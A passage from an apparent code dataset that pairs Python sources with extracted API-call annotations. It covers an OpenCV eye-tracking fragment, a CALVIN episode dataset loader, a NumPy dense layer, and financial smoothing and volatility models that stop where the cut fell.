cv2.KMEANS_RANDOM_CENTERS)\n', (2559, 2616), False, 'import cv2\n'), ((2777, 2829), 'cv2.threshold', 'cv2.threshold', (['eye_roi_gray', '(centers[0] - 10)', '(255)', '(0)'], {}), '(eye_roi_gray, centers[0] - 10, 255, 0)\n', (2790, 2829), False, 'import cv2\n'), ((2977, 3041), 'cv2.findContours', 'cv2.findContours', (['thresh', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (2993, 3041), False, 'import cv2\n'), ((3764, 3770), 'time.time', 'time', ([], {}), '()\n', (3768, 3770), False, 'from time import time\n'), ((3690, 3696), 'time.time', 'time', ([], {}), '()\n', (3694, 3696), False, 'from time import time\n'), ((3886, 3921), 'cv2.imwrite', 'cv2.imwrite', (['"""testimage.png"""', 'frame'], {}), "('testimage.png', frame)\n", (3897, 3921), False, 'import cv2\n'), ((2626, 2646), 'numpy.sqrt', 'np.sqrt', (['compactness'], {}), '(compactness)\n', (2633, 2646), True, 'import numpy as np\n'), ((3231, 3251), 'cv2.fitEllipse', 'cv2.fitEllipse', (['cont'], {}), '(cont)\n', (3245, 3251), False, 'import cv2\n'), ((3268, 3319), 'cv2.ellipse', 'cv2.ellipse', (['eye_roi_color', 'ellipse', '(0, 0, 255)', '(2)'], {}), '(eye_roi_color, ellipse, (0, 0, 255), 2)\n', (3279, 3319), False, 'import cv2\n'), ((3175, 3196), 'cv2.contourArea', 'cv2.contourArea', (['cont'], {}), '(cont)\n', (3190, 3196), False, 'import cv2\n'), ((3732, 3738), 'time.time', 'time', ([], {}), '()\n', (3736, 3738), False, 'from time import time\n')]
|
import logging
import os
from pathlib import Path
import re
from typing import Dict, List, Optional, Tuple
from calvin_agent.datasets.base_dataset import BaseDataset
from calvin_agent.datasets.utils.episode_utils import (
get_state_info_dict,
process_actions,
process_depth,
process_rgb,
process_state,
)
import numpy as np
import torch
logger = logging.getLogger(__name__)
class NpzDataset(BaseDataset):
"""
Dataset Loader that uses a shared memory cache
parameters
----------
datasets_dir: path of folder containing episode files (string must contain 'validation' or 'training')
save_format: format of episodes in datasets_dir (.pkl or .npz)
obs_space: DictConfig of the observation modalities of the dataset
max_window_size: maximum length of the episodes sampled from the dataset
"""
def __init__(self, *args, skip_frames: int = 0, n_digits: Optional[int] = None, **kwargs): # type: ignore
super().__init__(*args, **kwargs)
self.skip_frames = skip_frames
if self.with_lang:
(
self.episode_lookup,
self.lang_lookup,
self.max_batched_length_per_demo,
self.lang_ann,
) = self.load_file_indices_lang(self.abs_datasets_dir)
else:
self.episode_lookup, self.max_batched_length_per_demo = self.load_file_indices(self.abs_datasets_dir)
self.naming_pattern, self.n_digits = self.lookup_naming_pattern(n_digits)
def lookup_naming_pattern(self, n_digits):
it = os.scandir(self.abs_datasets_dir)
while True:
filename = Path(next(it))
if self.save_format in filename.suffix:
break
aux_naming_pattern = re.split(r"\d+", filename.stem)
naming_pattern = [filename.parent / aux_naming_pattern[0], filename.suffix]
n_digits = n_digits if n_digits is not None else len(re.findall(r"\d+", filename.stem)[0])
assert len(naming_pattern) == 2
assert n_digits > 0
return naming_pattern, n_digits
def get_episode_name(self, idx: int) -> Path:
"""
Convert frame idx to file name
"""
return Path(f"{self.naming_pattern[0]}{idx:0{self.n_digits}d}{self.naming_pattern[1]}")
def zip_sequence(self, start_idx: int, end_idx: int, idx: int) -> Dict[str, np.ndarray]:
"""
Load consecutive individual frames saved as npy files and combine to episode dict
parameters:
-----------
start_idx: index of first frame
end_idx: index of last frame
returns:
-----------
episode: dict of numpy arrays containing the episode where keys are the names of modalities
"""
episodes = [self.load_episode(self.get_episode_name(file_idx)) for file_idx in range(start_idx, end_idx)]
episode = {key: np.stack([ep[key] for ep in episodes]) for key, _ in episodes[0].items()}
if self.with_lang:
episode["language"] = self.lang_ann[self.lang_lookup[idx]][0] # TODO check [0]
return episode
def get_sequences(self, idx: int, window_size: int) -> Dict:
"""
parameters
----------
idx: index of starting frame
window_size: length of sampled episode
returns
----------
seq_state_obs: numpy array of state observations
seq_rgb_obs: tuple of numpy arrays of rgb observations
seq_depth_obs: tuple of numpy arrays of depths observations
seq_acts: numpy array of actions
"""
start_file_indx = self.episode_lookup[idx]
end_file_indx = start_file_indx + window_size
episode = self.zip_sequence(start_file_indx, end_file_indx, idx)
seq_state_obs = process_state(episode, self.observation_space, self.transforms, self.proprio_state)
seq_rgb_obs = process_rgb(episode, self.observation_space, self.transforms)
seq_depth_obs = process_depth(episode, self.observation_space, self.transforms)
seq_acts = process_actions(episode, self.observation_space, self.transforms)
info = get_state_info_dict(episode)
seq_lang = {"lang": torch.from_numpy(episode["language"]) if self.with_lang else torch.empty(0)}
seq_dict = {**seq_state_obs, **seq_rgb_obs, **seq_depth_obs, **seq_acts, **info, **seq_lang} # type:ignore
seq_dict["idx"] = idx # type:ignore
return seq_dict
def load_file_indices_lang(self, abs_datasets_dir: Path) -> Tuple[List, List, List, np.ndarray]:
"""
this method builds the mapping from index to file_name used for loading the episodes
parameters
----------
abs_datasets_dir: absolute path of the directory containing the dataset
returns
----------
episode_lookup: list for the mapping from training example index to episode (file) index
max_batched_length_per_demo: list of possible starting indices per episode
"""
assert abs_datasets_dir.is_dir()
episode_lookup = []
try:
print("trying to load lang data from: ", abs_datasets_dir / self.lang_folder / "auto_lang_ann.npy")
lang_data = np.load(abs_datasets_dir / self.lang_folder / "auto_lang_ann.npy", allow_pickle=True).reshape(
-1
)[0]
except Exception:
print("Exception, trying to load lang data from: ", abs_datasets_dir / "auto_lang_ann.npy")
lang_data = np.load(abs_datasets_dir / "auto_lang_ann.npy", allow_pickle=True).reshape(-1)[0]
ep_start_end_ids = lang_data["info"]["indx"]
lang_ann = lang_data["language"]["emb"]
lang_lookup = []
max_batched_length_per_demo = []
for i, (start_idx, end_idx) in enumerate(ep_start_end_ids):
assert end_idx >= self.max_window_size
cnt = 0
for idx in range(start_idx, end_idx + 1 - self.max_window_size):
if cnt % self.skip_frames == 0:
lang_lookup.append(i)
episode_lookup.append(idx)
cnt += 1
possible_indices = end_idx + 1 - start_idx - self.max_window_size # TODO: check it for skip_frames
max_batched_length_per_demo.append(possible_indices)
return episode_lookup, lang_lookup, max_batched_length_per_demo, lang_ann
def load_file_indices(self, abs_datasets_dir: Path) -> Tuple[List, List]:
"""
this method builds the mapping from index to file_name used for loading the episodes
parameters
----------
abs_datasets_dir: absolute path of the directory containing the dataset
returns
----------
episode_lookup: list for the mapping from training example index to episode (file) index
max_batched_length_per_demo: list of possible starting indices per episode
"""
assert abs_datasets_dir.is_dir()
episode_lookup = []
ep_start_end_ids = np.load(abs_datasets_dir / "ep_start_end_ids.npy")
logger.info(f'Found "ep_start_end_ids.npy" with {len(ep_start_end_ids)} episodes.')
max_batched_length_per_demo = []
for start_idx, end_idx in ep_start_end_ids:
assert end_idx > self.max_window_size
for idx in range(start_idx, end_idx + 1 - self.max_window_size):
episode_lookup.append(idx)
possible_indices = end_idx + 1 - start_idx - self.max_window_size
max_batched_length_per_demo.append(possible_indices)
return episode_lookup, max_batched_length_per_demo
|
[
"logging.getLogger",
"re.split",
"calvin_agent.datasets.utils.episode_utils.process_state",
"calvin_agent.datasets.utils.episode_utils.process_depth",
"calvin_agent.datasets.utils.episode_utils.process_rgb",
"pathlib.Path",
"calvin_agent.datasets.utils.episode_utils.get_state_info_dict",
"os.scandir",
"torch.from_numpy",
"calvin_agent.datasets.utils.episode_utils.process_actions",
"numpy.stack",
"re.findall",
"numpy.load",
"torch.empty"
] |
[((368, 395), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (385, 395), False, 'import logging\n'), ((1600, 1633), 'os.scandir', 'os.scandir', (['self.abs_datasets_dir'], {}), '(self.abs_datasets_dir)\n', (1610, 1633), False, 'import os\n'), ((1795, 1826), 're.split', 're.split', (['"""\\\\d+"""', 'filename.stem'], {}), "('\\\\d+', filename.stem)\n", (1803, 1826), False, 'import re\n'), ((2247, 2332), 'pathlib.Path', 'Path', (['f"""{self.naming_pattern[0]}{idx:0{self.n_digits}d}{self.naming_pattern[1]}"""'], {}), "(f'{self.naming_pattern[0]}{idx:0{self.n_digits}d}{self.naming_pattern[1]}'\n )\n", (2251, 2332), False, 'from pathlib import Path\n'), ((3842, 3930), 'calvin_agent.datasets.utils.episode_utils.process_state', 'process_state', (['episode', 'self.observation_space', 'self.transforms', 'self.proprio_state'], {}), '(episode, self.observation_space, self.transforms, self.\n proprio_state)\n', (3855, 3930), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((3948, 4009), 'calvin_agent.datasets.utils.episode_utils.process_rgb', 'process_rgb', (['episode', 'self.observation_space', 'self.transforms'], {}), '(episode, self.observation_space, self.transforms)\n', (3959, 4009), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((4034, 4097), 'calvin_agent.datasets.utils.episode_utils.process_depth', 'process_depth', (['episode', 'self.observation_space', 'self.transforms'], {}), '(episode, self.observation_space, self.transforms)\n', (4047, 4097), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((4117, 4182), 'calvin_agent.datasets.utils.episode_utils.process_actions', 'process_actions', (['episode', 'self.observation_space', 'self.transforms'], {}), '(episode, self.observation_space, self.transforms)\n', (4132, 4182), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((4198, 4226), 'calvin_agent.datasets.utils.episode_utils.get_state_info_dict', 'get_state_info_dict', (['episode'], {}), '(episode)\n', (4217, 4226), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((7161, 7211), 'numpy.load', 'np.load', (["(abs_datasets_dir / 'ep_start_end_ids.npy')"], {}), "(abs_datasets_dir / 'ep_start_end_ids.npy')\n", (7168, 7211), True, 'import numpy as np\n'), ((2929, 2967), 'numpy.stack', 'np.stack', (['[ep[key] for ep in episodes]'], {}), '([ep[key] for ep in episodes])\n', (2937, 2967), True, 'import numpy as np\n'), ((4255, 4292), 'torch.from_numpy', 'torch.from_numpy', (["episode['language']"], {}), "(episode['language'])\n", (4271, 4292), False, 'import torch\n'), ((4316, 4330), 'torch.empty', 'torch.empty', (['(0)'], {}), '(0)\n', (4327, 4330), False, 'import torch\n'), ((1972, 2005), 're.findall', 're.findall', (['"""\\\\d+"""', 'filename.stem'], {}), "('\\\\d+', filename.stem)\n", (1982, 2005), False, 'import re\n'), ((5326, 5415), 'numpy.load', 'np.load', (["(abs_datasets_dir / self.lang_folder / 'auto_lang_ann.npy')"], {'allow_pickle': '(True)'}), "(abs_datasets_dir / self.lang_folder / 'auto_lang_ann.npy',\n allow_pickle=True)\n", (5333, 5415), True, 'import numpy as np\n'), ((5611, 5677), 'numpy.load', 'np.load', (["(abs_datasets_dir / 'auto_lang_ann.npy')"], {'allow_pickle': '(True)'}), "(abs_datasets_dir / 'auto_lang_ann.npy', allow_pickle=True)\n", (5618, 5677), True, 'import numpy as np\n')]
|
import numpy
from NeuralNetworks.Layers.activations import lambda_from_function
class Dense:
def __init__(self, num_nodes = 1, input_dim = None, activation = 'sigmoid'):
# set number of nodes
self.num_nodes = num_nodes
self.input_dim = input_dim
self.activation = activation
# activation and derivate functions
self.activation_function, self.activation_gradient = lambda_from_function(activation)
def init(self, previous_layer):
self.previous_layer = previous_layer
if previous_layer == None:
input_dim = self.input_dim
else:
input_dim = previous_layer.num_nodes
self.weights = numpy.random.normal(0.0, pow(input_dim, -0.5), (self.num_nodes, input_dim))
self.output_shape = (self.num_nodes, 1)
def forward(self, input):
# calculate signals into hidden layer
hidden_input = numpy.dot(self.weights, input)
# calculate s emerging from hidden layer
output = self.activation_function(hidden_input)
assert(self.output_shape == output.shape)
self.layer_output = output
return self.layer_output
def backward(self, learning_rate, error_gradient_in, previous_layer_output):
# delta w = old d_W - alpha * (d_E / d_W) = learningrate * error_next * sigmoid(output_this) * (1 - sigmoid(output_this)) * output_previous
self.weights += learning_rate * numpy.dot(
(error_gradient_in * self.activation_gradient(self.layer_output)),
numpy.transpose(previous_layer_output))
# propagate the gradient error to previous layer
error_gradient_out = numpy.dot(self.weights.T, error_gradient_in)
return error_gradient_out
|
[
"numpy.dot",
"numpy.transpose",
"NeuralNetworks.Layers.activations.lambda_from_function"
] |
[((424, 456), 'NeuralNetworks.Layers.activations.lambda_from_function', 'lambda_from_function', (['activation'], {}), '(activation)\n', (444, 456), False, 'from NeuralNetworks.Layers.activations import lambda_from_function\n'), ((940, 970), 'numpy.dot', 'numpy.dot', (['self.weights', 'input'], {}), '(self.weights, input)\n', (949, 970), False, 'import numpy\n'), ((1698, 1742), 'numpy.dot', 'numpy.dot', (['self.weights.T', 'error_gradient_in'], {}), '(self.weights.T, error_gradient_in)\n', (1707, 1742), False, 'import numpy\n'), ((1571, 1609), 'numpy.transpose', 'numpy.transpose', (['previous_layer_output'], {}), '(previous_layer_output)\n', (1586, 1609), False, 'import numpy\n')]
|
import collections
import datetime
import logging
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
import numpy as np
import pandas as pd
import scipy as sp
import sklearn as sklear
import core.config as cconfig
import core.data_adapters as cdataa
import core.dataflow.utils as cdu
import core.finance as cfinan
import core.signal_processing as csigna
import core.statistics as cstati
import helpers.dbg as dbg
from core.dataflow.core import DAG, Node
from core.dataflow.nodes.base import (
ColModeMixin,
FitPredictNode,
SeriesToDfColProcessor,
)
from core.dataflow.nodes.sources import ReadDataFromDf
from core.dataflow.nodes.transformers import ColumnTransformer
from core.dataflow.visitors import extract_info
_LOG = logging.getLogger(__name__)
_COL_TYPE = Union[int, str]
_PANDAS_DATE_TYPE = Union[str, pd.Timestamp, datetime.datetime]
_TO_LIST_MIXIN_TYPE = Union[List[_COL_TYPE], Callable[[], List[_COL_TYPE]]]
class SmaModel(FitPredictNode, ColModeMixin):
"""
Fit and predict a smooth moving average (SMA) model.
"""
def __init__(
self,
nid: str,
col: _TO_LIST_MIXIN_TYPE,
steps_ahead: int,
tau: Optional[float] = None,
min_tau_periods: Optional[float] = 2,
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
Specify the data and SMA modeling parameters.
:param nid: unique node id
:param col: name of column to model
:param steps_ahead: as in `ContinuousSkLearnModel`
:param tau: as in `csigna.compute_smooth_moving_average`. If `None`,
learn this parameter. Will be re-learned on each `fit` call.
:param min_tau_periods: similar to `min_periods` as in
`csigna.compute_smooth_moving_average`, but expressed in units of
tau
:param col_mode: `merge_all` or `replace_all`, as in `ColumnTransformer()`
:param nan_mode: as in `ContinuousSkLearnModel`
"""
super().__init__(nid)
self._col = cdu.convert_to_list(col)
dbg.dassert_eq(len(self._col), 1)
self._steps_ahead = steps_ahead
dbg.dassert_lte(
0, self._steps_ahead, "Non-causal prediction attempted! Aborting..."
)
if nan_mode is None:
self._nan_mode = "raise"
else:
self._nan_mode = nan_mode
self._col_mode = col_mode or "replace_all"
dbg.dassert_in(self._col_mode, ["replace_all", "merge_all"])
# Smooth moving average model parameters to learn.
self._must_learn_tau = tau is None
self._tau = tau
self._min_tau_periods = min_tau_periods or 0
self._min_depth = 1
self._max_depth = 1
self._metric = sklear.metrics.mean_absolute_error
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
idx = df_in.index[: -self._steps_ahead]
x_vars = self._col
y_vars = self._col
df = cdu.get_x_and_forward_y_fit_df(
df_in, x_vars, y_vars, self._steps_ahead
)
forward_y_cols = df.drop(x_vars, axis=1).columns
# Handle presence of NaNs according to `nan_mode`.
self._handle_nans(idx, df.index)
# Define and fit model.
if self._must_learn_tau:
forward_y_df = df[forward_y_cols]
# Prepare forward y_vars in sklearn format.
forward_y_fit = cdataa.transform_to_sklearn(
forward_y_df, forward_y_df.columns.tolist()
)
# Prepare `x_vars` in sklearn format.
x_fit = cdataa.transform_to_sklearn(df, self._col)
self._tau = self._learn_tau(x_fit, forward_y_fit)
_LOG.debug("tau=%s", self._tau)
return self._predict_and_package_results(df_in, idx, df.index, fit=True)
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
cdu.validate_df_indices(df_in)
df = df_in.copy()
idx = df.index
# Restrict to times where col has no NaNs.
non_nan_idx = df.loc[idx][self._col].dropna().index
# Handle presence of NaNs according to `nan_mode`.
self._handle_nans(idx, non_nan_idx)
# Use trained model to generate predictions.
dbg.dassert_is_not(
self._tau,
None,
"Parameter tau not found! Check if `fit` has been run.",
)
return self._predict_and_package_results(
df_in, idx, non_nan_idx, fit=False
)
def get_fit_state(self) -> Dict[str, Any]:
fit_state = {"_tau": self._tau, "_info['fit']": self._info["fit"]}
return fit_state
def set_fit_state(self, fit_state: Dict[str, Any]) -> None:
self._tau = fit_state["_tau"]
self._info["fit"] = fit_state["_info['fit']"]
def _predict_and_package_results(
self,
df_in: pd.DataFrame,
idx: pd.Index,
non_nan_idx: pd.Index,
fit: bool = True,
) -> Dict[str, pd.DataFrame]:
data = cdataa.transform_to_sklearn(df_in.loc[non_nan_idx], self._col)
fwd_y_hat = self._predict(data)
forward_y_df = cdu.get_forward_cols(df_in, self._col, self._steps_ahead)
forward_y_df = forward_y_df.loc[non_nan_idx]
# Put predictions in dataflow dataframe format.
fwd_y_hat_vars = [f"{y}_hat" for y in forward_y_df.columns]
fwd_y_hat = cdataa.transform_from_sklearn(
non_nan_idx, fwd_y_hat_vars, fwd_y_hat
)
# Return targets and predictions.
df_out = forward_y_df.reindex(idx).merge(
fwd_y_hat.reindex(idx), left_index=True, right_index=True
)
dbg.dassert_no_duplicates(df_out.columns)
# Select columns for output.
df_out = self._apply_col_mode(
df_in, df_out, cols=self._col, col_mode=self._col_mode
)
# Update `info`.
info = collections.OrderedDict()
info["tau"] = self._tau
info["min_periods"] = self._get_min_periods(self._tau)
info["df_out_info"] = cdu.get_df_info_as_string(df_out)
method = "fit" if fit else "predict"
self._set_info(method, info)
return {"df_out": df_out}
def _handle_nans(
self, idx: pd.DataFrame.index, non_nan_idx: pd.DataFrame.index
) -> None:
if self._nan_mode == "raise":
if idx.shape[0] != non_nan_idx.shape[0]:
nan_idx = idx.difference(non_nan_idx)
raise ValueError(f"NaNs detected at {nan_idx}")
elif self._nan_mode == "drop":
pass
elif self._nan_mode == "leave_unchanged":
pass
else:
raise ValueError(f"Unrecognized nan_mode `{self._nan_mode}`")
def _learn_tau(self, x: np.array, y: np.array) -> float:
def score(tau: float) -> float:
x_srs = pd.DataFrame(x.flatten())
sma = csigna.compute_smooth_moving_average(
x_srs,
tau=tau,
min_periods=0,
min_depth=self._min_depth,
max_depth=self._max_depth,
)
min_periods = self._get_min_periods(tau)
return self._metric(sma[min_periods:], y[min_periods:])
tau_lb, tau_ub = 1, 1000
# Satisfy 2 * tau_ub * min_tau_periods = len(x).
# This ensures that no more than half of the `fit` series is burned.
if self._min_tau_periods > 0:
tau_ub = int(len(x) / (2 * self._min_tau_periods))
opt_results = sp.optimize.minimize_scalar(
score, method="bounded", bounds=[tau_lb, tau_ub]
)
return opt_results.x
def _get_min_periods(self, tau: float) -> int:
"""
Return burn-in period.
Multiplies `tau` by `min_tau_periods` and converts to an integer.
:param tau: kernel tau (approximately equal to center of mass)
:return: minimum number of periods required to generate a prediction
"""
return int(np.rint(self._min_tau_periods * tau))
def _predict(self, x: np.array) -> np.array:
x_srs = pd.DataFrame(x.flatten())
# TODO(*): Make `min_periods` configurable.
min_periods = int(np.rint(self._min_tau_periods * self._tau))
_LOG.debug("min_periods=%f", min_periods)
x_sma = csigna.compute_smooth_moving_average(
x_srs,
tau=self._tau,
min_periods=min_periods,
min_depth=self._min_depth,
max_depth=self._max_depth,
)
return x_sma.values
class SingleColumnVolatilityModel(FitPredictNode):
def __init__(
self,
nid: str,
steps_ahead: int,
col: _COL_TYPE,
p_moment: float = 2,
progress_bar: bool = False,
tau: Optional[float] = None,
nan_mode: Optional[str] = None,
out_col_prefix: Optional[str] = None,
) -> None:
"""
Parameters have the same meaning as `SmaModel`.
"""
super().__init__(nid)
self._col = col
self._steps_ahead = steps_ahead
dbg.dassert_lte(1, p_moment)
self._p_moment = p_moment
self._progress_bar = progress_bar
self._tau = tau
self._learn_tau_on_fit = tau is None
self._nan_mode = nan_mode
self._out_col_prefix = out_col_prefix
def get_fit_state(self) -> Dict[str, Any]:
fit_state = {
"_col": self._col,
"_tau": self._tau,
"_info['fit']": self._info["fit"],
"_out_col_prefix": self._out_col_prefix,
}
return fit_state
def set_fit_state(self, fit_state: Dict[str, Any]):
self._col = fit_state["_col"]
self._tau = fit_state["_tau"]
self._info["fit"] = fit_state["_info['fit']"]
self._out_col_prefix = fit_state["_out_col_prefix"]
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return {"df_out": self._fit_predict_helper(df_in, fit=True)}
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return {"df_out": self._fit_predict_helper(df_in, fit=False)}
def _fit_predict_helper(self, df_in: pd.DataFrame, fit: bool) -> pd.DataFrame:
info = collections.OrderedDict()
name = self._out_col_prefix or self._col
name = str(name)
dbg.dassert_not_in(name + "_vol", df_in.columns)
if self._learn_tau_on_fit and fit:
tau = None
else:
tau = self._tau
config = self._get_config(col=self._col, out_col_prefix=name, tau=tau)
dag = self._get_dag(df_in[[self._col]], config)
mode = "fit" if fit else "predict"
df_out = dag.run_leq_node(
"demodulate_using_vol_pred", mode, progress_bar=self._progress_bar
)["df_out"]
info[self._col] = extract_info(dag, [mode])
if self._learn_tau_on_fit and fit:
self._tau = info[self._col]["compute_smooth_moving_average"]["fit"][
"tau"
]
df_out = df_out.reindex(df_in.index)
self._set_info(mode, info)
return df_out
def _get_config(
self,
col: _COL_TYPE,
out_col_prefix: _COL_TYPE,
tau: Optional[float] = None,
) -> cconfig.Config:
"""
Generate a DAG config.
:param col: column whose volatility is to be modeled
:param tau: tau for SMA; if `None`, then to be learned
:return: a complete config to be used with `_get_dag()`
"""
config = cconfig.get_config_from_nested_dict(
{
"calculate_vol_pth_power": {
"cols": [col],
"col_rename_func": lambda x: out_col_prefix + "_vol",
"col_mode": "merge_all",
},
"compute_smooth_moving_average": {
"col": [out_col_prefix + "_vol"],
"steps_ahead": self._steps_ahead,
"tau": tau,
"col_mode": "merge_all",
"nan_mode": self._nan_mode,
},
"calculate_vol_pth_root": {
"cols": [
out_col_prefix + "_vol",
out_col_prefix + "_vol_" + str(self._steps_ahead),
out_col_prefix
+ "_vol_"
+ str(self._steps_ahead)
+ "_hat",
],
"col_mode": "replace_selected",
},
"demodulate_using_vol_pred": {
"signal_cols": [col],
"volatility_col": out_col_prefix
+ "_vol_"
+ str(self._steps_ahead)
+ "_hat",
"signal_steps_ahead": 0,
"volatility_steps_ahead": self._steps_ahead,
"col_rename_func": lambda x: out_col_prefix + "_vol_adj",
"col_mode": "replace_selected",
"nan_mode": self._nan_mode,
},
}
)
return config
def _get_dag(self, df_in: pd.DataFrame, config: cconfig.Config) -> DAG:
"""
Build a DAG from data and config.
:param df_in: data over which to run DAG
:param config: config for configuring DAG nodes
:return: ready-to-run DAG
"""
dag = DAG(mode="strict")
_LOG.debug("%s", config)
# Load `df_in`.
nid = "load_data"
node = ReadDataFromDf(nid, df_in)
tail_nid = self._append(dag, None, node)
# Raise volatility columns to pth power.
nid = "calculate_vol_pth_power"
node = ColumnTransformer(
nid,
transformer_func=lambda x: np.abs(x) ** self._p_moment,
**config[nid].to_dict(),
)
tail_nid = self._append(dag, tail_nid, node)
# Predict pth power of volatility using smooth moving average.
nid = "compute_smooth_moving_average"
node = SmaModel(nid, **config[nid].to_dict())
tail_nid = self._append(dag, tail_nid, node)
# Calculate the pth root of volatility columns.
nid = "calculate_vol_pth_root"
node = ColumnTransformer(
nid,
transformer_func=lambda x: np.abs(x) ** (1.0 / self._p_moment),
**config[nid].to_dict(),
)
tail_nid = self._append(dag, tail_nid, node)
# Divide returns by volatilty prediction.
nid = "demodulate_using_vol_pred"
node = VolatilityModulator(
nid, mode="demodulate", **config[nid].to_dict()
)
self._append(dag, tail_nid, node)
return dag
# TODO(gp): This code has several copies. Move it to the base class.
@staticmethod
def _append(dag: DAG, tail_nid: Optional[str], node: Node) -> str:
dag.add_node(node)
if tail_nid is not None:
dag.connect(tail_nid, node.nid)
return node.nid
class _MultiColVolatilityModelMixin:
def _fit_predict_volatility_model(
self, df: pd.DataFrame, fit: bool, out_col_prefix: Optional[str] = None
) -> Tuple[Dict[str, pd.DataFrame], collections.OrderedDict]:
dfs = {}
info = collections.OrderedDict()
for col in df.columns:
local_out_col_prefix = out_col_prefix or col
scvm = SingleColumnVolatilityModel(
"volatility",
steps_ahead=self._steps_ahead,
col=col,
p_moment=self._p_moment,
progress_bar=self._progress_bar,
tau=self._tau,
nan_mode=self._nan_mode,
out_col_prefix=local_out_col_prefix,
)
if fit:
df_out = scvm.fit(df[[col]])["df_out"]
info_out = scvm.get_info("fit")
self._col_fit_state[col] = scvm.get_fit_state()
else:
scvm.set_fit_state(self._col_fit_state[col])
df_out = scvm.predict(df[[col]])["df_out"]
info_out = scvm.get_info("predict")
dfs[col] = df_out
info[col] = info_out
return dfs, info
class VolatilityModel(
FitPredictNode,
ColModeMixin,
_MultiColVolatilityModelMixin,
):
"""
Fit and predict a smooth moving average volatility model.
Wraps `SmaModel` internally, handling calculation of volatility from
returns and column appends.
"""
def __init__(
self,
nid: str,
steps_ahead: int,
cols: Optional[_TO_LIST_MIXIN_TYPE] = None,
p_moment: float = 2,
progress_bar: bool = False,
tau: Optional[float] = None,
col_rename_func: Callable[[Any], Any] = lambda x: f"{x}_zscored",
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
Specify the data and smooth moving average (SMA) modeling parameters.
:param nid: unique node id
:param cols: name of columns to model
:param steps_ahead: as in ContinuousSkLearnModel
:param p_moment: exponent to apply to the absolute value of returns
:param tau: as in `csigna.compute_smooth_moving_average`. If `None`,
learn this parameter
:param col_rename_func: renaming function for z-scored column
:param col_mode:
- If "merge_all" (default), merge all columns from input dataframe and
transformed columns
- If "replace_selected", merge unselected columns from input dataframe
and transformed selected columns
- If "replace_all", leave only transformed selected columns
:param nan_mode: as in ContinuousSkLearnModel
"""
super().__init__(nid)
self._cols = cols
self._steps_ahead = steps_ahead
#
dbg.dassert_lte(1, p_moment)
self._p_moment = p_moment
#
self._progress_bar = progress_bar
#
dbg.dassert(tau is None or tau > 0)
self._tau = tau
self._col_rename_func = col_rename_func
self._col_mode = col_mode or "merge_all"
self._nan_mode = nan_mode
# State of the model to serialize/deserialize.
self._fit_cols: List[_COL_TYPE] = []
self._col_fit_state = {}
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return self._fit_predict_helper(df_in, fit=True)
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return self._fit_predict_helper(df_in, fit=False)
def get_fit_state(self) -> Dict[str, Any]:
fit_state = {
"_fit_cols": self._fit_cols,
"_col_fit_state": self._col_fit_state,
"_info['fit']": self._info["fit"],
}
return fit_state
def set_fit_state(self, fit_state: Dict[str, Any]):
self._fit_cols = fit_state["_fit_cols"]
self._col_fit_state = fit_state["_col_fit_state"]
self._info["fit"] = fit_state["_info['fit']"]
def _fit_predict_helper(self, df_in: pd.DataFrame, fit: bool):
cdu.validate_df_indices(df_in)
# Get the columns.
self._fit_cols = cdu.convert_to_list(self._cols or df_in.columns.tolist())
df = df_in[self._fit_cols]
dfs, info = self._fit_predict_volatility_model(df, fit=fit)
df_out = pd.concat(dfs.values(), axis=1)
df_out = self._apply_col_mode(
df_in.drop(df_out.columns.intersection(df_in.columns), 1),
df_out,
cols=self._fit_cols,
col_mode=self._col_mode,
)
method = "fit" if fit else "predict"
self._set_info(method, info)
return {"df_out": df_out}
class MultiindexVolatilityModel(FitPredictNode, _MultiColVolatilityModelMixin):
"""
Fit and predict a smooth moving average volatility model.
Wraps SmaModel internally, handling calculation of volatility from
returns and column appends.
"""
def __init__(
self,
nid: str,
in_col_group: Tuple[_COL_TYPE],
steps_ahead: int,
p_moment: float = 2,
progress_bar: bool = False,
tau: Optional[float] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
Specify the data and sma modeling parameters.
:param nid: unique node id
:param steps_ahead: as in ContinuousSkLearnModel
:param p_moment: exponent to apply to the absolute value of returns
:param tau: as in `csigna.compute_smooth_moving_average`. If `None`,
learn this parameter
:param nan_mode: as in ContinuousSkLearnModel
"""
super().__init__(nid)
dbg.dassert_isinstance(in_col_group, tuple)
self._in_col_group = in_col_group
self._out_col_group = in_col_group[:-1]
self._out_col_prefix = str(in_col_group[-1])
#
self._steps_ahead = steps_ahead
dbg.dassert_lte(1, p_moment)
self._p_moment = p_moment
#
self._progress_bar = progress_bar
#
self._tau = tau
self._nan_mode = nan_mode
#
self._col_fit_state = {}
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return self._fit_predict_helper(df_in, fit=True)
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
return self._fit_predict_helper(df_in, fit=False)
def get_fit_state(self) -> Dict[str, Any]:
fit_state = {
"_col_fit_state": self._col_fit_state,
"_info['fit']": self._info["fit"],
}
return fit_state
def set_fit_state(self, fit_state: Dict[str, Any]):
self._col_fit_state = fit_state["_col_fit_state"]
self._info["fit"] = fit_state["_info['fit']"]
def _fit_predict_helper(self, df_in: pd.DataFrame, fit: bool):
cdu.validate_df_indices(df_in)
